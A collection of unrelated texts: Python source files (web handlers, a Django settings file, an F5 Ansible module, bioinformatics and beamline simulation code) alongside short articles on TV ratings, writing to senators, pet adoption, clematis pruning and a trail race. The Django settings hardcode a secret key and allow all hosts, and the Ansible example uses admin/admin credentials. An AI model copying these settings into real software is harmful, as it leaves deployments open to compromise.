return self.response.write(json.dumps({'request' : formatRequest(request), 'mentors' : mentors}))
def findMentorsForRequest(request):
tags = [t.lower() for t in request.tags]
mentors = Mentor.query(Mentor.assigned == False).fetch()
# Each mentor should be assessed based on:
# 1. # of tags matching that of request
# 2. # of previously completed tasks balanced with rating
# should return list of best mentors
#First sort by responded.
mentors.sort(key=lambda m: len(m.responded))
#Then sort by rating
mentors.sort(key=lambda m: m.computeAvg(), reverse=True)
#Finally sort by relevance of tags
mentors.sort(key=lambda m: len([t for t in m.tags if t.lower() in request.tags]), reverse=True)
return mentors
def pretty_date(time=False):
"""
Get a datetime object or a int() Epoch timestamp and return a
pretty string like 'an hour ago', 'Yesterday', '3 months ago',
'just now', etc
"""
now = datetime.datetime.now()
if type(time) is int:
diff = now - datetime.datetime.fromtimestamp(time)
elif isinstance(time,datetime.datetime):
diff = now - time
elif not time:
diff = now - now
second_diff = diff.seconds
day_diff = diff.days
if day_diff < 0:
return ''
if day_diff == 0:
if second_diff < 10:
return "just now"
if second_diff < 60:
return str(second_diff) + " seconds ago"
if second_diff < 120:
return "a minute ago"
if second_diff < 3600:
return str(second_diff / 60) + " minutes ago"
if second_diff < 7200:
return "an hour ago"
if second_diff < 86400:
return str(second_diff / 3600) + " hours ago"
if day_diff == 1:
return "Yesterday"
if day_diff < 7:
return str(day_diff) + " days ago"
if day_diff < 31:
return str(day_diff / 7) + " weeks ago"
if day_diff < 365:
return str(day_diff / 30) + " months ago"
return str(day_diff / 365) + " years ago"
class MentorListHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_list.html", {"mentors": Mentor.query().fetch(limit=1000)}))
|
48 HOURS MYSTERY last Saturday (4) was first in adults 25-54 (3.3/09), adults 18-49 (2.6/08) and second in households (5.8/10) and viewers (8.60m). This is 48 HOURS MYSTERY's best delivery in households, viewers and key demos since Nov. 26, 2005.
Compared to the same night last year, 48 HOURS MYSTERY was up +29% in viewers, +23% in households, +32% in adults 25-54 and +37% in adults 18-49.
48 HOURS MYSTERY is broadcast Saturdays (10:00-11:00 PM, ET/PT). Susan Zirinsky is the executive producer.
|
"""
Django settings for mapa project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'l00f7@-+!--7$ah@n%--7sq_zkot66367zs(in+u3(=o9-j102'
# SECURITY WARNING: don't run with debug turned on in production!
if 'DEBUG' in os.environ:
DEBUG = os.getenv('DEBUG')
else:
DEBUG = False
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_filters',
'cronotacografo',
'rest_framework',
'rest_framework_gis',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mapa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mapa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'HOST': os.getenv('DB_HOST'),
'NAME': os.getenv('DB_NAME'),
'USER': os.getenv('DB_USER'),
'PASSWORD': os.getenv('DB_PASSWORD')
},
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend',
'rest_framework.filters.SearchFilter',
],
}
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = '/usr/src/app/static/'
STATIC_URL = '/static/'
# Allow bulk deletion in admin
DATA_UPLOAD_MAX_NUMBER_FIELDS = 9999999999999
|
Added by Thomas Beutlich almost 4 years ago. Updated over 3 years ago.
I revisited the commits bound to #1043, esp. r3630. I do no think that msync is necessary for MemIo. According to http://man7.org/linux/man-pages/man2/msync.2.html msync is only useful for memory mapped files which is not the case in MemIo. I would rather see it in FileIo where memory mapped files are used. Thus my questions in #1043-28 (28) and #1043-29 (29) are still not answered.
#1077: Removed msync() calls from MemIo.
Stumbled upon this because valgrind complains about msync() being called with uninitialized parameters.
After some reading, I agree with Thomas that msync() is not necessary for MemIo. I'd simply remove it. Also, according to this thread, it is not needed before munmap(), at least on POSIX systems.
Robin, I'm not making any changes since you plan to revisit this. If you're ok with my suggestion, you can assign this issue to me and I'll do it.
I'm more than happy to pass this over to you, Andreas. Thank You.
Removed msync() calls from MemIo. Valgrind is happy again. Not planning to make changes to FileIo.
Thanks for considering and fixing this.
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <erjac77@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_profile_mssql
short_description: BIG-IP ltm profile mssql module
description:
- Configures a profile to manage mssql(tds) database traffic.
version_added: "2.4"
author:
- "Gabriel Fortin (@GabrielFortin)"
options:
partition:
description:
- Displays the administrative partition within which the profile resides.
read_pool:
description:
- Specifies the pool of MS SQL database servers to which the system sends ready-only requests.
read_write_split_by_command:
description:
- When enabled, the system decides which pool to send the client requests the by the content in the message.
default: disabled
choices: ['disabled', 'enabled']
read_write_split_by_user:
description:
- When enabled, the system decides which pool to send the client requests the by user name.
default: disabled
choices: ['disabled', 'enabled']
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
user_can_write_by_default:
description:
- Specifies whether users have write access by default.
default: true
choices: ['false', 'true']
user_list:
description:
- Specifies the users who have read-only access to the MS SQL if user-can-write-by-default is true, or the
users who have write access to the MS SQL database if user-can-write-by-default is false.
write_persist_timer:
description:
- Specify how many minimum time in milliseconds the connection will be persisted to write-pool after
connection switch to write pool.
write_pool:
description:
- Specifies the pool of MS SQL database servers to which the system sends requests that are not read-only.
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
EXAMPLES = '''
- name: Create LTM Profile MSSQL
f5bigip_ltm_profile_mssql:
f5_hostname: 172.16.227.35
f5_username: admin
f5_password: admin
f5_port: 443
name: my_mssql_profile
partition: Common
state: present
delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
@property
def argument_spec(self):
argument_spec = dict(
read_pool=dict(type='str'),
read_write_split_by_command=dict(type='str', choices=F5_ACTIVATION_CHOICES),
read_write_split_by_user=dict(type='str', choices=F5_ACTIVATION_CHOICES),
user_can_write_by_default=dict(type='str', choices=['false', 'true']),
user_list=dict(type='list'),
write_persist_timer=dict(type='int'),
write_pool=dict(type='str')
)
argument_spec.update(F5_PROVIDER_ARGS)
argument_spec.update(F5_NAMED_OBJ_ARGS)
return argument_spec
@property
def supports_check_mode(self):
return True
class F5BigIpLtmProfileMssql(F5BigIpNamedObject):
def _set_crud_methods(self):
self._methods = {
'create': self._api.tm.ltm.profile.mssqls.mssql.create,
'read': self._api.tm.ltm.profile.mssqls.mssql.load,
'update': self._api.tm.ltm.profile.mssqls.mssql.update,
'delete': self._api.tm.ltm.profile.mssqls.mssql.delete,
'exists': self._api.tm.ltm.profile.mssqls.mssql.exists
}
def main():
params = ModuleParams()
module = AnsibleModule(argument_spec=params.argument_spec, supports_check_mode=params.supports_check_mode)
try:
obj = F5BigIpLtmProfileMssql(check_mode=module.check_mode, **module.params)
result = obj.flush()
module.exit_json(**result)
except Exception as exc:
module.fail_json(msg=str(exc))
if __name__ == '__main__':
main()
|
Write to your senator to bring attention to your issue of choice.
One of the best way to get the attention of your senator, be it of the state or federal variety, is to write a professional letter. All government officials take this kind of correspondence seriously as it represents a voter's interests. If congressmen do not listen to and respond appropriately to voters' concerns, they are less likely to receive the electoral support needed for re-election. There are three keys to writing a letter to a senator. Keep it focused. Keep it professional. Give your Senator an action item.
Starting in the upper left-hand corner list your name and contact information. Under this put the date followed by the senator's address. Then write a brief salutation and begin the text of your letter. Finally, write a closing and sign your name at the bottom.
Introduce yourself and your credentials, if these are appropriate to the issue. State precisely for what reason you are writing to your senator. Keep it factual not emotional. Provide as much specific information as possible detailing how your issue effects both yourself and others. If a particular bill is involved be sure to list it by name and number.
Present your senator with an action item. Having something concrete that you are looking for will help focus his attention and better the chances of your letter getting the appropriate reply. Ask your senator for a specific response. Thank him for taking the time to read your letter and ask that he either consider voting a certain way or ask that his office get back to you with a particular piece of information.
Bradley, Steve. "How to Write a Sample Letter to a Senator." Synonym, https://classroom.synonym.com/how-to-write-a-sample-letter-to-a-senator-12083944.html. 29 September 2017.
|
# -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
"""
Anaconda decorators
"""
import os
import sys
import time
import pstats
import logging
import functools
try:
import cProfile
CPROFILE_AVAILABLE = True
except ImportError:
CPROFILE_AVAILABLE = False
try:
import sublime
from .helpers import get_settings, project_name
except ImportError:
# we just imported the file from jsonserver so we don't need get_settings
pass
def auto_project_switch(func):
"""Auto kill and start a new jsonserver on project switching
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if not self.green_light:
return
view = sublime.active_window().active_view()
auto_project_switch = get_settings(view, 'auto_project_switch', False)
python_interpreter = get_settings(view, 'python_interpreter')
# expand ~/ in the python_interpreter path
python_interpreter = os.path.expanduser(python_interpreter)
# expand $shell vars in the python_interpreter path
python_interpreter = os.path.expandvars(python_interpreter)
if (
auto_project_switch and hasattr(self, 'project_name') and (
project_name() != self.project_name
or self.process.args[0] != python_interpreter)
):
print('Project or iterpreter switch detected...')
self.process.kill()
self.reconnecting = True
self.start()
else:
func(self, *args, **kwargs)
return wrapper
def timeit(logger):
"""Decorator for timeit timeit timeit
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
starttime = time.time()
result = func(*args, **kwargs)
endtime = time.time()
total = endtime - starttime
logger.debug(
'Func {} took {} secs'.format(func.__name__, total)
)
return result
return wrapper
return decorator
def profile(func):
"""Run the profiler in the given function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
view = sublime.active_window().active_view()
if get_settings(view, 'anaconda_debug', False) == 'profiler':
if CPROFILE_AVAILABLE:
pr = cProfile.Profile()
pr.enable()
result = func(*args, **kwargs)
pr.disable()
ps = pstats.Stats(pr, stream=sys.stdout)
ps.sort_stats('time')
ps.print_stats(15)
else:
logging.error(
'cProfile doesn\'t seems to can be imported on ST3 + {}, '
'sorry. You may want to use @timeit instead, so sorry '
'really'.format(sys.platform)
)
result = func(*args, **kwargs)
else:
result = func(*args, **kwargs)
return result
return wrapper
|
Remember, all of these organizations have pets available for adoption.
While adopting a pet is a fun idea for the holidays, don't jump in too quickly. Adopting a dog or a cat is a lifetime commitment, for the lifetime of the animal. A living animal is not a "Christmas present" that one person should give another as a surprise. Adopting a pet is a great thing to do at any time of year, but the eventual end caregiver should be the person choosing the animal, and should do it not only in the spirit of the season, but because they've wanted to do it anyway, regardless of the holiday buzz.
There are plenty of wonderful, loving pets available for adoption in the Worcester area, and throughout Massachusetts and New England. Shop around, and make sure the animal is a good fit for the family adopting. Humans should always have equal or higher energy than a dog, for instance. An active family who likes running, bike riding, hiking, and day trips that include lots of physical activity would do great with a Border Collie, but an English Bulldog might have trouble keeping up. Conversely, the folks who want to watch football on TV, and not actually play the sport, might fare better adopting a senior pet, a cat (or two!) or that English Bulldog who can't keep up with aforementioned active family.
Not ready to make that 15-year commitment? (because that's what it is!) Shelters and rescues are always looking for foster homes. It's a great way to have a pet, help out a shelter or rescue, and get to know how an animal would fit into a home and lifestyle. Many times foster families "fail", which is a good thing (a foster-fail means the foster family ends up keeping the pet).
There are a lot of senior pets looking for homes, which is a great way to make a shorter commitment, and help a pet in need (and a shelter or rescue in need). Senior pets are almost always more uncomfortable in a shelter setting than their younger counterparts in neighboring crates. Senior dogs or cats make wonderful companions, and are almost always fully-trained. They may have special medical needs, but the rewards outweigh the negatives.
If interest lies with a puppy or kitten, be prepared for months of house-training and other training, as well as chewing, digging, scratching, knocking things over, staining and soiling! That's not to say that having a puppy or kitten from the beginning isn't a wise choice (think how great they will be when they're a senior!), but "know what you're getting into" is a good thing to keep in mind.
The majority of pets surrendered to shelters are between one and three years of age -- experienced pet parents can adopt one of these energetic dogs and cats who are often surrendered for no other reason than the original adopters ignorance of the extent of the commitment required when raising a young cat or dog.
Check out the various adoption specials offered by the shelters and rescues listed in this article, or go to petfinder.com for more.
Still not ready to welcome a pet into your own home? Check out the great holiday shopping offers from Second Chance Animal Shelter, and Worcester Animal Rescue League and the Santa photo ops from Broken Tail and Great Dog Rescue. Some offers are listed on the group's Facebook pages, and not on their web sites. From clickable discounts online, to store discounts at various local stores who donate part of purchases to one of the shelters, to special holiday ornaments, decorations, 2013 calendars and gifts with shelter or rescue logos, the possibilities are endless to give back while doing your holiday shopping. Or, take the easiest way out and make a simple donation to any local shelter. No amount is too big, or too small. It's all in the holiday spirit.
Cette entrée a été publiée dans News et étiqueté pet adoption, Holidays, Pet Adoption Advice, νm; Pet Adoption. pet rescue. Ajouter aux favoris permalien.
|
from targqc.utilz.logger import warn
metric_names = [
'Reference size',
'Regions size/percentage of reference (on target)',
'Regions size/percentage of reference (on target) %',
'Coverage Mean',
'Coverage Mean (on target)',
'Coverage Standard Deviation',
'Coverage Standard Deviation (on target)',
'Reference size',
'Number of reads',
'Mapped reads',
'Mapped reads %',
'Unmapped reads',
'Unmapped reads %',
'Mapped reads (on target)',
'Mapped reads (on target) %',
'Mapped paired reads',
'Mapped paired reads %',
'Paired reads',
'Paired reads %',
'Duplicated reads (flagged)',
'Duplicated reads (flagged) %',
'Duplicated reads (flagged) (on target)',
'Duplicated reads (flagged) (on target) %',
'Read min length',
'Read max length',
'Read mean length',
'Mean Mapping Quality (on target)',
'Mismatches (on target)',
'Insertions (on target)',
'Deletions (on target)',
'Homopolymer indels (on target)',
'Mean Mapping Quality',
'Mismatches',
'Insertions',
'Deletions',
'Homopolymer indels',
]
ALLOWED_UNITS = ['%']
def parse_qualimap_sample_report(report_fpath):
value_by_metric = dict()
def __get_td_tag_contents(line):
## examples:
# <td class=column1>Paired reads</td>
# <td class=column2>80,244 / 99.89%</td>
crop_left = line.split('>')
if len(crop_left) < 2:
return None
crop_right = crop_left[1].split('<')
return crop_right[0].strip()
def __fill_record(metric_name, line):
val = __get_td_tag_contents(line)
val = val.replace(' ', '').replace(',', '')
try:
val = val.replace(b'\xc2\xa0', '')
except:
val = val.replace(b'\xc2\xa0'.decode(), '')
if metric_name == 'Read min/max/mean length': # special case
for metric_infix, value in zip(['min', 'max', 'mean'], val.split('/')):
value_by_metric['Read ' + metric_infix + ' length'] = value
else:
if metric_name not in metric_names:
# warn('Qualimap metric "' + metric_name + '" is not in allowed metric_names')
return
num_chars = []
unit_chars = []
i = 0
while i < len(val) and (val[i].isdigit() or val[i] in ['.']):
num_chars += val[i]
i += 1
while i < len(val):
unit_chars += val[i]
i += 1
val_num = ''.join(num_chars)
val_unit = ''.join(unit_chars)
if val_unit and val_unit in ALLOWED_UNITS:
# metric.unit = val_unit
pass
try:
val = int(val_num)
if val_unit == '%':
val = float(val) / 100
except ValueError:
try:
val = float(val_num)
if val_unit == '%':
val /= 100
except ValueError: # it is a string
val = val_num + val_unit
value_by_metric[metric_name] = val
if val_unit.startswith('/'): # for values like "80,220 / 99.86%"
meta_val = val_unit.replace('/', '').strip()
if '%' in meta_val:
try:
val = float(meta_val.replace('%', '')) / 100.0
except ValueError:
pass
else:
value_by_metric[metric_name + ' %'] = val
sections = [['start', 'Summary'],
['globals (on target)', 'Globals (inside of regions)'],
['globals', 'Globals'],
['coverage (on target)', 'Coverage (inside of regions)'],
['coverage', 'Coverage'],
['mq (on target)', 'Mapping Quality (inside of regions)'],
['mq', 'Mapping Quality'],
['mismatches and indels (on target)', 'Mismatches and indels (inside of regions)'],
['mismatches and indels', 'Mismatches and indels'],
['finish', 'Coverage across reference']] # plots are starting from this line
on_target_stats_suffix = ' (on target)'
coverage_stats_prefix = 'Coverage '
with open(report_fpath) as f:
cur_section = None
cur_metric_name = None
for line in f:
if 'mapped' in line.lower():
pass
if 'class=table-summary' in line:
cur_section = None
continue
if cur_section is None:
for name, pattern in sections:
if pattern in line:
cur_section = name
break
if cur_section is None:
continue
if cur_section == 'finish':
break
if line.find('class=column1') != -1:
cur_metric_name = __get_td_tag_contents(line)
if cur_section.endswith('(on target)'):
cur_metric_name += on_target_stats_suffix
if cur_section.startswith('coverage'):
cur_metric_name = coverage_stats_prefix + cur_metric_name
# if not metric_storage.get_metric(cur_metric_name): # special case for Duplication rate and Clipped reads (Qualimap v.1 and v.2 difference)
# if metric_storage.get_metric(cur_metric_name + on_target_stats_suffix): # extra 'on target' metrics
# cur_metric_name += on_target_stats_suffix
if cur_metric_name and line.find('class=column2') != -1:
__fill_record(cur_metric_name, line)
cur_metric_name = None
return value_by_metric
|
If you’ve ever seen a clematis that is one big mountain of tangled up stems, it’s almost enough to scare you away from growing them. But let’s take a look at why, when, and how these remarkable vines should be pruned and you’ll find it’s not as difficult as it seems.
Properly pruning clematises will yield the maximum quantity of flowers by stimulating new growth. Pruning keeps the more vigorous vines under control. If not pruned, these large plants can literally tear down almost any support with their sheer weight. Keeping vines pruned brings flowers down to eye level rather than at a top of a tall plant. And if you have one of those mountains of tangled stems, pruning allows air and light to circulate through the leaves, reducing moisture that can cause diseases, and also tidies up the entire plant and displays the flowers to their best advantage. Clematises can live up to 50 years, so we want to take good care of them.
It’s obvious, therefore, that all clematises need to be pruned. Almost everyone knows that there are three main groups of clematis, with three different pruning techniques. Don’t let this worry you because it’s not as difficult as it sounds.
Example of a top-heavy vine (Duchess of Albany, Group 3). Incidentally, the rabbits chew this one down to the ground every year!
Before we find out more about the three groups, there is something that every new clematis needs. Very early in the first spring after the year you plant them, all types of clematises need to be cut back to approximately 12 inches from the ground. I know, it’s really hard to do because everyone wants to see the flowers, but doing so will make the root system stronger and promote branching and new stems from underground, making the entire plant bushier and healthier. So that means that you’ll lose your flowers the first year on some clematises, but it also means that you’ll have many years of more flowers than ever. That sounds like a pretty good trade off to me! If you don’t do this, it won’t kill your vine, but you will be very disappointed when you end up with one or two wimpy vines with only a couple of flowers. Then you’ll probably end up cutting it back anyway and losing even more time in the process.
Let's take a look at the three pruning groups. Every clematis has a pruning group assigned to it. If you purchase from a reputable nursery, that information will be included on the tag or on the nursery's website. If it isn’t, you can find the pruning group for each cultivar right here in our ATP database. Once you know the pruning group, it’s just a matter of following the information for that group.
Group #1: These are the early-flowering and evergreen clematises, and the group also includes the alpina, cirrhosa, macropetala and montana species. They flower on “old wood,” which is growth from the previous year. Don’t go crazy pruning this group. Only a light pruning is needed. Any growth that occurs after pruning will be the stems that will produce buds for next year's flowers. If you want these vines to spread quickly, only prune to remove dead or damaged growth. To keep vigorous growth under control, you’ll want to prune back a bit more. Try to avoid pruning any woody growth.
Group #2: Included in this group are early and mid-season large-flowering, double and semi-double clematis. These plants can be a little tricky because they flower on both old and new wood. The biggest flush with the largest flowers is in spring on old wood, followed by a smaller flush in fall, or even by a steady, small amount of flowers throughout the summer. When pruning, follow the vine down to a swelling leaf axle bud and prune right above it.
Not a very good example, but if you look at the large vine right at the place where its branching out, you can see the leaf axil buds just beginning to form.
Remove any dead wood, tidy the vine up a bit, and prune back to keep growth in check. If you have a big tangle of vines left from last year, try to untangle as many vines as you can after the first flush of flowers. If you can't untangle the vines, this is the time for a hard pruning, up to as much as 1/3 of each vine. If you do a hard pruning and your plant has double flowers, you may only get single flowers later this year. To keep a more natural look, stagger the length of the vines as you trim them back. Tie any new growth to supports to keep the plant open to air and sunlight. You’ll also want to remove any old leaf stalks remaining on the vines from last year. Plants in this group tend to get bare toward the bottom as they get older and do well with other plants around them, covering their bare stems. If they get too top heavy, they can be pruned back quite hard without damaging them. If you live in a very cold area, you’ll probably have to prune back farther due to damage by winter weather, or you may not have a choice at all if they die back to the ground.
Notice the flowers all the way to the ground on this beautifully pruned clematis.
Some suggest that Group 2 plants should be cut back hard every third year to avoid the tangled, old growth that can occur on the top of these plants.
If you’re feeling adventurous, you can also do a special “second-year pruning” on these clematises, and on Group 1 plants as well. This is another hard pruning, but this time it entails cutting back the vines to about three feet from the ground. Again, this causes more new stems to grow from the ground and stimulates the vines to branch out. This isn’t necessary, but it will improve the appearance and health of your clematis in subsequent years.
Group #3: Late large-flowering, late flowering species, and viticella clematises make up this group. They generally die back to the ground in winter in cold areas. If not, they respond well to hard pruning and can be cut back to about two feet tall. They usually get flowers on the last several feet of new growth and can be cut back even farther because they don’t bloom on old wood. Like the Group 2 vines, they will get bare stems toward the bottom as they age if they aren't cut back hard. Hard pruning sounds brutal, but it will reward you with lots of new growth and many flowers. As the new growth appears, tie it to supports to keep it looking its best. This is probably the easiest group to prune.
There are also clematises known as integrifolia or herbaceous clematises. These are non-vining perennials with a dense and somewhat sprawling habit. Although they can't attach themselves to a support, they can be tied to one or left to sprawl on the ground. These can be cut to the ground with your other perennials in late fall or early spring.
Another reason to prune is to control wilt. Clematis wilt occurs when the ends of the vine turn black and the vine, or even the entire plant, collapses. When this happens, cutting the plant all the way back to the ground will produce new growth. This is a radical pruning method but it will save your plant.
As you gain more experience with the clematises you have, you’ll be able to recognize the three pruning groups from their bloom time. Group 1 blooms in early spring, Group 2 blooms on old wood in the spring and new wood later in the year, and Group 3 blooms on new wood late in the year.
Now that you know how easy it is to prune them, your plants will be happier and prettier and will produce more flowers. Quite an impressive return on investment for only a few minutes a year!
|
# the ttwotheta motor and detector
# test xpd sim of motor movement
import numpy as np
from ophyd.sim import SynSignal, motor1, motor2
from lmfit import Model, Parameter, Parameters
from lmfit.models import VoigtModel, LinearModel
from lmfit.lineshapes import voigt
class SynGaussPeaks(SynSignal):
"""
Evaluate a point on a peaks based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
center : number
center of peak
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
def __init__(self, name, motor, motor_field, centers, Imax, sigma=1,
noise=None, noise_multiplier=1, random_state=None, offset=None,
**kwargs):
if noise not in ('poisson', 'uniform', None):
raise ValueError("noise must be one of 'poisson', 'uniform', None")
self._motor = motor
if random_state is None:
random_state = np.random
def func():
m = motor.read()[motor_field]['value']
v = m*0
for center in centers:
v += Imax * np.exp(-(m - center) ** 2 / (2 * sigma ** 2))
if offset is not None:
v += offset
if noise == 'poisson':
v += int(random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += random_state.uniform(-1, 1) * noise_multiplier
return v
super().__init__(func=func, name=name, **kwargs)
D_SPACINGS = {'LaB6': np.array([4.15772, 2.94676, 2.40116]),
'Si': 5.43095 / np.array([np.sqrt(3), np.sqrt(8), np.sqrt(11), np.sqrt(27)]),
}
import numpy as np
#def gaussian(theta, center, width):
# return 1500 / (np.sqrt(2*np.pi) * width) * np.exp(-((theta - center) / width)**2 / 2)
# for the simulation
SIMULATED_D = "Si"
def intensity(theta, amplitude, width, wavelength):
result = np.clip(5 * np.random.randn(), 0, None) # Gaussian noise
for d in D_SPACINGS['Si']:
assert wavelength < 2 * d, \
"wavelength would result in illegal arg to arcsin"
try:
center = np.arcsin(wavelength / (2 * d))
except Exception:
print("DEAD"); center = 0
result += voigt(theta, amplitude, center, width)
result += voigt(-theta, amplitude, center, width)
return result
def current_intensity_peaks():
amplitude = 0.5
width = 0.004 # degrees
wavelength = 12.398 / 66.4 # angtroms
two_theta = motor1.read()['motor1']['value'] # degrees
theta = np.deg2rad(two_theta / 2) # radians
return intensity(theta, amplitude, np.deg2rad(width), wavelength)
def current_intensity_dips():
amplitude = 0.5
width = 0.004 # degrees
wavelength = 12.398 / 66.4 # angtroms
hw_theta = motor1.read()['motor1']['value'] # degrees
theta = np.deg2rad(hw_theta + 35.26) # radians
return -intensity(theta, amplitude, np.deg2rad(width), wavelength) + 10000
th_cal = motor1
sc = SynSignal(name="det", func=current_intensity_dips)
''' test sim motors
import bluesky.plan_stubs as bps
import bluesky.plans as bp
from bluesky.callbacks import LivePlot
def myplan():
yield from bps.abs_set(motor1, 0)
yield from bp.rel_scan([det_6peaks], motor1, -10, 10, 1000)
RE(myplan(), LivePlot('det_6peaks', 'motor1'))
'''
|
Looking for a footing-friendly, low-key run through the woods? Have a go at Gail’s Trail Run in Huntington State Park, Redding, CT. This year approximately 130 runners took off on Sunday, December 11 at 8am for a 5.2 mile loop which included some challenging elevation changes and great scenery. The trail is mostly a two-track which provides for plenty of room throughout, making passing easy and providing good vision.
I especially liked the start/finish area. No major fanfare, blaring music or armies of volunteers. Instead, a very parochial atmosphere where you don’t even show your ID to get your number and (cool) hoodie. If you’re pre-registered, your name is there just as it should be. One porta-john, a table with a jug of Gatorade and a few gel packs. Simple. Right level of organization. Let’s just run this thing.
Some people run with their dogs. A handful of stud runners, but not there for PRs or qualifying times. Just give it your best and let the finishing times take care of themselves. At the start we meander up the trail until the starter says to stop and hold, then a short beep and we’re off. No overhead digital clock or balloon arch. We’re in the woods after all, respecting nature.
Runners are polite, respectful when passing or being passed, and no one crows about being in the top 10. On this 23-degree day the winner wears shorts and a tank top. The benefit is for pancreatic cancer research, and the event honors Gail Connor, who passed away from the disease.
Well done organizers, I’ll definitely be back next year. This was a really great event.
This entry was posted in Races and tagged connecticut, Race, Running, trail run. Bookmark the permalink.
Are you familiar with Leatherman’s Loop in NY? It’s a 10km in April/May and has some fun rivers, streams, etc.
Marisa: Yes, several of my friends have run that event. In fact, until two years ago the Gail’s Trail run was held there. I will do Leatherman’s one day, although with over 1,200 participants it is sounding quite crowded!
Great read Michael! So cool you and Kendall are doing this together. Looking forward to more posts from the two of you!
Thanks Jon. Kendall has dragged me into the blogging world, so now I’ve got to think of clever things to say on a regular basis. Guess I’d better keep running! Great to hear from you.
|
from __future__ import print_function, division, absolute_import
# Copyright (c) 2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import logging
from rhsmlib.facts import collector
log = logging.getLogger(__name__)
class CleanupCollector(collector.FactsCollector):
no_uuid_platforms = ['powervm_lx86', 'xen-dom0', 'ibm_systemz']
def get_all(self):
cleanup_facts = {}
dmi_socket_info = self.replace_socket_count_with_dmi()
cleanup_facts.update(dmi_socket_info)
return cleanup_facts
def explain_lack_of_virt_uuid(self):
# No virt.uuid equiv is available for guests on these hypervisors
#virt_is_guest = self._collected_hw_info['virt.is_guest']
if not self._is_a_virt_host_type_with_virt_uuids():
log.debug("we don't sell virt uuids here")
